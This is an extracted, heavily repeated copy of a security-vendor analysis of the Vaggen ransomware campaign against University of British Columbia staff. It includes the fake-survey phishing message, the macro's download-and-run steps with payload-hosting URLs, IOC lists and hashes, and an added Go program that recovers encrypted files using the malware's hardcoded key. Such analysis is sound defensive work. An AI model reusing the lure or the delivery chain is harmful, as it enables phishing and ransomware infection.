3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2230 of 
3467\n\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims who want to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and DropBox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam coming from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to see whether it was successful (the return value is the task ID of the executed application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted when a particular event occurs.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD, to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, starting from the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. Some of these map as follows:\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (for example, the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64; the XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncryption and renaming of the files is implemented as the callback of the standard Go function path.filepath.Walk.\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2238 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2239 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2240 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2241 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2242 of 
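Recovering .VAGGEN files from the layout described above (12-byte nonce, ciphertext, 16-byte GCM tag) with the hardcoded key, as an added Go example that is neither the original post's code nor the malware's: the helper names (decryptVaggen, restoreFile, restoreTree) are the example's own, and the sample encrypted file is constructed inline in the same layout so the program runs offline.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

const (
	vaggenKey = "du_tar_mitt_hjart_mina_pengarna0" // hardcoded AES-256 key quoted in the write-up (32 bytes)
	vaggenExt = ".VAGGEN"
	nonceLen  = 12 // GCM nonce stored at the start of every .VAGGEN file
	tagLen    = 16 // GCM tag that gcm.Seal appends after the ciphertext
)

// newGCM wraps the key in AES-GCM; a key of the wrong length fails here.
func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// decryptVaggen reverses the layout [12-byte nonce][ciphertext][16-byte tag].
// gcm.Open verifies the tag, so a wrong key or a damaged file yields an error, not garbage.
func decryptVaggen(key, blob []byte) ([]byte, error) {
	if len(blob) < nonceLen+tagLen {
		return nil, fmt.Errorf("blob of %d bytes cannot hold a nonce and a GCM tag", len(blob))
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, blob[:nonceLen], blob[nonceLen:], nil)
}

// encryptVaggen builds a blob in the same layout, only to construct test input
// offline (constructed sample data; this is not the malware's code).
func encryptVaggen(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceLen)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to dst, which already holds the nonce.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// restoreFile decrypts one .VAGGEN file and writes the original name beside it.
// The encrypted copy is left in place until the recovered files are verified.
func restoreFile(key []byte, path string) (string, error) {
	if !strings.HasSuffix(path, vaggenExt) {
		return "", fmt.Errorf("%s: not a %s file", path, vaggenExt)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	plain, err := decryptVaggen(key, blob)
	if err != nil {
		return "", fmt.Errorf("%s: %w", path, err)
	}
	out := strings.TrimSuffix(path, vaggenExt)
	return out, os.WriteFile(out, plain, 0o600)
}

// restoreTree walks root with filepath.Walk (the API the ransomware used to find
// its targets), restores every .VAGGEN file and collects per-file errors.
func restoreTree(key []byte, root string) (restored int, errs []error) {
	_ = filepath.Walk(root, func(path string, info os.FileInfo, err error) error {
		if err == nil && !info.IsDir() && strings.HasSuffix(path, vaggenExt) {
			if _, err = restoreFile(key, path); err == nil {
				restored++
			}
		}
		if err != nil {
			errs = append(errs, err)
		}
		return nil // keep walking past individual failures
	})
	return restored, errs
}

func main() {
	key := []byte(vaggenKey)
	dir, _ := os.MkdirTemp("", "vaggen-demo")
	defer os.RemoveAll(dir)
	blob, _ := encryptVaggen(key, []byte("constructed sample document"))
	_ = os.WriteFile(filepath.Join(dir, "report.docx"+vaggenExt), blob, 0o600)
	n, errs := restoreTree(key, dir)
	fmt.Printf("restored %d file(s), %d error(s)\n", n, len(errs))
}
```

Because GCM authenticates the ciphertext, a file whose tag check fails was either encrypted by a variant with a different key or damaged, so the tool reports it rather than writing garbage over the user's data.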
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2279 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2280 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2281 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2282 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2283 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2284 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2285 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2286 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2287 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2288 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2289 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2290 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2291 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2292 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2293 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2294 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2295 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2296 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2297 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
